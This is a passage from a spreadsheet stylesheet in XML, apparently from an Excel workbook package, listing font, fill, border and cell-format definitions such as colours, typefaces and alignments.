    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <color rgb="FF313739"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <color rgb="FF333333"/>
      <name val="&quot;Helvetica Neue&quot;"/>
    </font>
    <font>
      <b/>
      <sz val="10.0"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF4A86E8"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF333333"/>
      <name val="'Helvetica Neue'"/>
    </font>
    <font>
      <sz val="9.0"/>
      <color rgb="FF323232"/>
      <name val="Verdana"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <color rgb="FFFF0000"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF333333"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FFFF0000"/>
    </font>
    <font>
      <sz val="11.0"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="12.0"/>
      <color rgb="FF333333"/>
      <name val="Helvetica Neue"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <sz val="10.0"/>
    </font>
    <font>
      <u/>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <color rgb="FFFF0000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF2C2B2B"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <u/>
      <sz val="12.0"/>
      <color rgb="FF4078C0"/>
      <name val="-apple-system"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <name val="Liberation Serif"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF000000"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="&quot;Helvetica Neue&quot;"/>
    </font>
    <font>
      <u/>
      <sz val="10.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="'Liberation Serif'"/>
    </font>
    <font>
      <u/>
      <color rgb="FF4A86E8"/>
      <name val="Consolas"/>
    </font>
    <font>
      <b/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF111111"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF333333"/>
      <name val="Consolas"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <name val="-apple-system"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <b/>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FFA71D5D"/>
      <name val="Arial"/>
    </font>
  </fonts>
  <fills count="16">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="lightGray"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF4A86E8"/>
        <bgColor rgb="FF4A86E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFB7B7B7"/>
        <bgColor rgb="FFB7B7B7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF3333"/>
        <bgColor rgb="FFFF3333"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF99FF66"/>
        <bgColor rgb="FF99FF66"/>
      </patternFill>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00FFFF"/>
        <bgColor rgb="FF00FFFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEFF1F3"/>
        <bgColor rgb="FFEFF1F3"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF7F7F7"/>
        <bgColor rgb="FFF7F7F7"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFEEEEFF"/>
        <bgColor rgb="FFEEEEFF"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA64D79"/>
        <bgColor rgb="FFA64D79"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF9900"/>
        <bgColor rgb="FFFF9900"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA4C2F4"/>
        <bgColor rgb="FFA4C2F4"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="4">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="thin">
        <color rgb="FFEEEEEE"/>
      </bottom>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FFEEEEEE"/>
      </right>
      <top/>
      <bottom/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color rgb="FFEEEEEE"/>
      </right>
      <top/>
      <bottom style="thin">
        <color rgb="FFEEEEEE"/>
      </bottom>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" applyAlignment="1" applyFont="1"/>
  </cellStyleXfs>
  <cellXfs count="210">
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="4" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="164" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="7" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="23" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="3" fontId="2" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="5" fontId="29" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="top"/>
    </xf>
    <xf borderId="0" fillId="9" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="5" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="0" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="10" fontId="32" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="4" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="11" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="0" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="36" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="41" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="42" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="42" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="43" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="44" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="44" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="44" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="2" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="6" fontId="45" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="46" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="48" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="8" fontId="47" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="49" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="50" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="51" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="52" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="53" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="54" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="55" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="left"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="0" fontId="56" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
    <xf borderId="0" fillId="6" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="57" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment/>
    </xf>
